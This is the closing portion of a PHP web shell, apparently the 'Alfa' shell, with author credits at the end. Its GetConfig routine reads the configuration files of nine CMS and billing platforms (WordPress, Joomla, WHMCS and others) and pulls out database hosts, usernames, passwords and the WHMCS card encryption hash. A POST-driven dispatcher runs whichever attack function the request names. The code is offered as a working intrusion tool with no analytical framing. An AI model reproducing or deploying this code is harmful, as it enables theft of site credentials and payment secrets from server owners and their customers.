curl_setopt($process, CURLOPT_HTTPHEADER, array(‘Content-Type: application/x-www-form-urlencoded’));
}
$return = curl_exec($process);
curl_close($process);
return $return;
}
function error($error) {
echo “<center><div style=’width:500px;border: 3px solid #FFEEFF; padding: 3px; background-color: #FFDDFF;font-family: verdana; font-size: 10px’><b>cURL Error</b><br>$error</div></center>”;
die;
}
}
function getConfigHtml($cms){
$content = ”;
$cms_array = array(“wp” => “WordPress”, “vb” => “vBulletin”, “whmcs” => “Whmcs”, “joomla” => “Joomla”, “phpnuke” => “PHPNuke”,”phpbb”=>”PHPBB”,”mybb”=>”MyBB”,”drupal”=>”Drupal”,”smf”=>”SMF”);
$content .= “<form onSubmit=’g(\”GetConfig\”,null,this.cms.value,this.path.value);return false;’><div class=’txtfont’>Cms: </div> <select name=’cms’style=’width:100px;’>”;
foreach($cms_array as $key => $val){
$content .= “<option value=’{$key}’ “.($key==$cms?’selected=selected’:”).”>{$val}</option>”;
}
$content .= “</select> <div class=’txtfont’>Path(installed cms/Config): </div> <input type=’text’ name=’path’ value=’”.$_SERVER['DOCUMENT_ROOT'].”/’ size=’30′ /> <button class=’button’>GetConfig</button>”;
$content .= “</form>”;
return $content;
}
function alfaGetConfig(){
$cms = $_POST['alfa1'];
$path = trim($_POST['alfa2']);
$config = array(
‘wp’=>array(‘file’=>’/wp-config.php’,
‘host’=>array(“/define\(‘DB_HOST’,(\s+)(?:’|\”)(.*?)(?:’|\”)\);/”,2),
‘dbname’=>array(“/define\(‘DB_NAME’,(\s+)(?:’|\”)(.*?)(?:’|\”)\);/”,2),
‘dbuser’=>array(“/define\(‘DB_USER’,(\s+)(?:’|\”)(.*?)(?:’|\”)\);/”,2),
‘dbpw’=>array(“/define\(‘DB_PASSWORD’,(\s+)(?:’|\”)(.*?)(?:’|\”)\);/”,2),
‘prefix’=>array(“/table_prefix(\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3)
),
‘drupal’=>array(‘file’=>’/config.php’,
‘host’=>array(“/define\(‘DB_HOSTNAME’,(\s+)(?:’|\”)(.*?)(?:’|\”)\);/”,2),
‘dbname’=>array(“/define\(‘DB_DATABASE’,(\s+)(?:’|\”)(.*?)(?:’|\”)\);/”,2),
‘dbuser’=>array(“/define\(‘DB_USERNAME’,(\s+)(?:’|\”)(.*?)(?:’|\”)\);/”,2),
‘dbpw’=>array(“/define\(‘DB_PASSWORD’,(\s+)(?:’|\”)(.*?)(?:’|\”)\);/”,2),
‘prefix’=>array(“/define\(‘DB_PREFIX’,(\s+)(?:’|\”)(.*?)(?:’|\”)\);/”,2)
),
‘vb’=>array(‘file’=>’/includes/config.php’,
‘host’=>array(“/config\['MasterServer'\]\['servername'\](\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3),
‘dbuser’=>array(“/config\['MasterServer'\]\['username'\](\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3),
‘dbname’=>array(“/config\['Database'\]\['dbname'\](\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3),
‘dbpw’=>array(“/config\['MasterServer'\]\['password'\](\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3),
‘prefix’=>array(“/config\['Database'\]\['tableprefix'\](\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3)
),
‘phpnuke’=>array(‘file’=>’/config.php’,
‘host’=>array(‘/dbhost(\s+)=(\s+)(?:\’|”)(.*?)(?:\’|”);/’,3),
‘dbname’=>array(‘/dbname(\s+)=(\s+)(?:\’|”)(.*?)(?:\’|”);/’,3),
‘dbuser’=>array(‘/dbuname(\s+)=(\s+)(?:\’|”)(.*?)(?:\’|”);/’,3),
‘dbpw’=>array(‘/dbpass(\s+)=(\s+)(?:\’|”)(.*?)(?:\’|”);/’,3),
‘prefix’=>array(‘/prefix(\s+)=(\s+)(?:\’|”)(.*?)(?:\’|”);/’,3)
),
‘smf’=>array(‘file’=>’/Settings.php’,
‘host’=>array(“/db_server(\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3),
‘dbname’=>array(“/db_name(\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3),
‘dbuser’=>array(“/db_user(\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3),
‘dbpw’=>array(“/db_passwd(\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3),
‘prefix’=>array(“/db_prefix(\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3)
),
‘whmcs’=>array(‘file’=>’/configuration.php’,
‘host’=>array(“/db_host(\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3),
‘dbname’=>array(“/db_name(\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3),
‘dbuser’=>array(“/db_username(\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3),
‘dbpw’=>array(“/db_password(\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3),
‘cc_encryption_hash’=>array(“/cc_encryption_hash(\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3)
),
‘joomla’=>array(‘file’=>’/configuration.php’,
‘host’=>array(“/\\\$host(\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3),
‘dbname’=>array(“/\\\$db(\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3),
‘dbuser’=>array(“/\\\$user(\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3),
‘dbpw’=>array(“/\\\$password(\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3),
‘prefix’=>array(“/\\\$dbprefix(\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3)
),
‘phpbb’=>array(‘file’=>’/config.php’,
‘host’=>array(“/dbhost(\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3),
‘dbname’=>array(“/dbname(\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3),
‘dbuser’=>array(“/dbuser(\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3),
‘dbpw’=>array(“/dbpasswd(\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3),
‘prefix’=>array(“/table_prefix(\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3)
),
‘mybb’=>array(‘file’=>’/inc/config.php’,
‘host’=>array(“/config\['database'\]\['hostname'\](\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3),
‘dbname’=>array(“/config\['database'\]\['database'\](\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3),
‘dbuser’=>array(“/config\['database'\]\['username'\](\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3),
‘dbpw’=>array(“/config\['database'\]\['password'\](\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3),
‘prefix’=>array(“/config\['database'\]\['table_prefix'\](\s+)=(\s+)(?:’|\”)(.*?)(?:’|\”);/”,3)
)
);
$data = array();
$srch_host = $config[$cms]['host'][0];
$srch_user = $config[$cms]['dbuser'][0];
$srch_name = $config[$cms]['dbname'][0];
$srch_pw = $config[$cms]['dbpw'][0];
$prefix = $config[$cms]['prefix'][0];
$file = $config[$cms]['file'];
$chost = $config[$cms]['host'][1];
$cuser = $config[$cms]['dbuser'][1];
$cname = $config[$cms]['dbname'][1];
$cpw = $config[$cms]['dbpw'][1];
$cprefix = $config[$cms]['prefix'][1];
if(@is_dir($path)||_alfa_is_dir($path)){
$file=$path.$file;
}elseif(@is_file($path)||_alfa_is_dir($path,”-e”)){
$file=$path;
}else{
return false;
}
$file = __read_file($file);
if(preg_match($srch_host, $file, $mach)){
$data['host'] = $mach[$chost];
}
if(preg_match($srch_user, $file, $mach)){
$data['user'] = $mach[$cuser];
}
if(preg_match($srch_name, $file, $mach)){
$data['dbname'] = $mach[$cname];
}
if(preg_match($srch_pw, $file, $mach)){
$data['password'] = $mach[$cpw];
}
if(isset($prefix)){
if(preg_match($prefix, $file, $mach)){
$data['prefix'] = $mach[$cprefix];
}
}
if($cms==’whmcs’){
if(preg_match($config[$cms]['cc_encryption_hash'][0], $file, $mach)){
$data['cc_encryption_hash'] = $mach[3];
}
}
echo json_encode($data);
}
if(empty($_POST['a']))
if(isset($default_action) && function_exists(‘alfa’ . $default_action))
$_POST['a'] = $default_action;
else
$_POST['a'] = ‘FilesMan’;
if(!empty($_POST['a']) && function_exists(‘alfa’ . $_POST['a']))
call_user_func(‘alfa’ . $_POST['a']);
exit;
/*
#Persian Gulf For Ever
#skype : sole.sad
#skype : ehsan.invisible
*/